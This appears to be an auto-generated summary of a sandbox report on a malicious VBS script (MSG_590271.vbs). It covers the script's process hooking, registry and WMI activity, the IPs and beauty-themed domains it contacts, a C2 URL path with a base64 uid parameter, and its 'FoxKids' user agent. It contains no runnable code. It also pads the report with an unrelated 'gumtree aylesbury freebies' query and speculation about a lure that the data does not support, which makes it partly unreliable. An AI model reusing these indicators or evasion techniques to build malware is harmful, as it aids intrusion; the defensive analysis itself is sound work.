The provided source data, derived from a hybrid analysis report, documents a cybersecurity threat involving a malicious Visual Basic Script (VBS) file named MSG_590271.vbs. This file, sized approximately 5.4 MiB, is designed to execute code that installs hooks into running Windows processes, specifically targeting wscript.exe. The script attempts to modify system libraries such as WSHIP6.DLL, WSHTCPIP.DLL, MSCORWKS.DLL, and NSI.DLL. Analysis indicates that the script loads the task scheduler COM API (taskschd.dll) and touches various registry keys and system files, including wscript.exe, wshom.ocx, and sorting default files. These actions suggest an attempt to establish persistence or evade detection within a compromised system.
The script exhibits distinct network behaviors, sending TCP traffic to multiple IP addresses on port 80 without standard HTTP headers. The contacted IP addresses include 95.216.112.243, 5.175.14.93, 178.33.235.187, and 178.62.221.228. Associated domains identified during the analysis are b1-beautysalon.com, globalbeauty-kosmetik.de, thecricketstudio.com, and cibankdubai.com. Notably, the HTTP traffic analysis reveals a specific GET request to b1-beautysalon.com and globalbeauty-kosmetik.de involving a base64 encoded string appended to an image file path (/wp-content/uploads/2020/03/turn/444444.png?uid=...). Decoding the uid parameter reveals the string "Microsoft Windows 7 Professional". This specific payload delivery method is a critical indicator of the threat actor's infrastructure.
While the file name MSG_590271.vbs and the context of the domains (beauty and cosmetics) might suggest a lure related to free samples or promotional offers, the provided data does not contain explicit text confirming a specific "free sample" campaign. However, the use of beauty-related domains (b1-beautysalon.com, globalbeauty-kosmetik.de) as infrastructure for payload delivery strongly implies that the attackers are leveraging the allure of beauty products to trick users into executing the malicious script. Consumers searching for freebies or sample requests should be aware that malicious actors often use popular consumer topics, such as beauty products, to distribute malware. The analysis highlights that the script sends traffic on typical HTTP outbound ports but without valid HTTP headers, which is a technique often used to bypass simple firewall rules or to communicate with command and control servers in a non-standard manner.
The script also attempts to interact with the Windows Management Instrumentation (WMI) and Component Object Model (COM) interfaces, as evidenced by the registry touches for CLSIDs related to IWbemServices, IEnumWbemClassObject, and ADODB.Stream. The loading of the .NET runtime environment (mscorlib.ni.dll) further indicates the script's capability to execute complex, managed code. The presence of the User-Agent string "FoxKids" in the HTTP request is a specific identifier that can be used for tracking or filtering within the attacker's infrastructure.
Regarding the specific search query "gumtree aylesbury freebies," the provided source data does not contain any information regarding Gumtree, Aylesbury, or legitimate freebie offers associated with these terms. The data focuses exclusively on the technical analysis of a malicious file. Therefore, no factual claims can be made regarding free sample availability on Gumtree or in Aylesbury based on the provided materials. The article focuses solely on the cybersecurity threat identified in the analysis, which masquerades as or is associated with beauty product-related web properties.
Consumers seeking free samples should always exercise caution when downloading files or clicking links from unverified sources. Legitimate brand freebies and sample programs typically do not require the execution of standalone script files like VBS. Instead, they utilize official sign-up forms on verified brand websites. The analysis serves as a reminder that "free sample" lures are a common vector for malware distribution. The specific domains b1-beautysalon.com and globalbeauty-kosmetik.de should be treated as suspicious infrastructure associated with this threat.
The analysis details the specific bytes written to memory addresses, indicating a sophisticated code injection technique. The script's behavior of touching files in the Windows directory and loading specific modules like taskschd.dll confirms its intent to manipulate system scheduling and execution flows. The lack of standard HTTP headers in the outbound traffic is a notable evasion technique. The use of base64 encoding in the URL parameter is a common method to obfuscate data being sent to the command and control server.
In summary, the provided data describes a malicious VBS script that utilizes beauty-related domains to facilitate network communication and payload delivery. It employs process hooking, registry manipulation, and non-standard network traffic to compromise system integrity. While the context suggests a lure involving beauty samples, the data does not confirm any specific promotional offer. The analysis is strictly technical and identifies the threat infrastructure and behavior patterns.
Conclusion
The provided source data details a malicious VBS script (MSG_590271.vbs) that targets Windows systems. The script is associated with beauty-related domains, including b1-beautysalon.com and globalbeauty-kosmetik.de, which serve as infrastructure for command and control communication. The malware exhibits advanced evasion techniques, such as process hooking, registry manipulation, and non-standard HTTP traffic. Although the context implies a lure related to free beauty samples, the data does not confirm any specific legitimate offer. Consumers are advised to remain vigilant against malware disguised as promotional offers and to rely only on official brand channels for free sample requests.